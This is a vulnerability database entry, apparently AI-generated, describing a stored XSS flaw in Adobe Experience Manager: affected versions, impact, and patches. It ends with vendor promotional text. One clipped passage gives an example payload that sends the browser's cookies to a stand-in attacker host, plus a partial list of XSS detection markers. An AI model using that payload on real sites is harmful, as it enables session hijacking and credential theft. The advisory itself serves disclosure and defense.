
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-48355 is a stored Cross-Site Scripting (XSS) vulnerability in Adobe Experience Manager (AEM) that allows a low-privileged attacker to inject malicious scripts into vulnerable form fields. When a victim browses to a page containing the compromised field, the injected JavaScript executes in their browser. Affected products include Adobe Experience Manager as a Cloud Service (versions up to 2026.5.0), AEM 6.5 (up to 6.5.25.0), and AEM 6.5 LTS (up to SP2). The vulnerability was disclosed on July 14, 2026, with a patch released the same day. It carries a CVSS v3.1 base score of 5.4 (Medium) (Adobe Advisory).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically of the stored (persistent) XSS variant. A low-privileged, network-accessible attacker can submit malicious JavaScript payloads into AEM form fields that are not properly sanitized or encoded before being stored and subsequently rendered to other users. Exploitation requires user interaction (a victim must visit the affected page) and low privileges on the AEM instance, but the scope is changed — meaning the injected script executes in the context of the victim's browser session rather than the attacker's (Adobe Advisory).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of users who view the affected AEM pages, potentially enabling session hijacking, credential theft, phishing overlays, or unauthorized actions performed on behalf of the victim. Confidentiality and integrity are both partially impacted, while availability is unaffected. Because AEM is commonly used as an enterprise content management platform, a compromised session could expose sensitive content, administrative credentials, or enable further lateral movement within the organization (Adobe Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an event-handler-based variant.<script>, javascript:, onerror=, onload=) in form field parameters.Adobe released patches on July 14, 2026 as part of security bulletin APSB26-74. Users should apply the following fixes: AEM Cloud Service users should update to version 2026.6.0 or later; AEM 6.5 users should apply the hotfix for NPR-43971 (on top of 6.5.25); AEM 6.5 LTS users should apply the hotfix for NPR-43972 (on top of SP2). As interim mitigations, organizations should implement strict input validation and output encoding on all AEM form fields, deploy a Web Application Firewall (WAF) to detect and block XSS injection attempts, and restrict low-privilege user write access to sensitive form components where possible (Adobe Advisory).
The Center for Internet Security (CIS) published an advisory noting multiple vulnerabilities in Adobe products patched in July 2026, including this XSS issue. No significant independent researcher commentary or social media discussion specific to CVE-2026-48355 has been observed, consistent with the low EPSS score and absence of public exploit code. Coverage has been limited to automated vulnerability tracking platforms and standard patch-Tuesday-style roundups.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."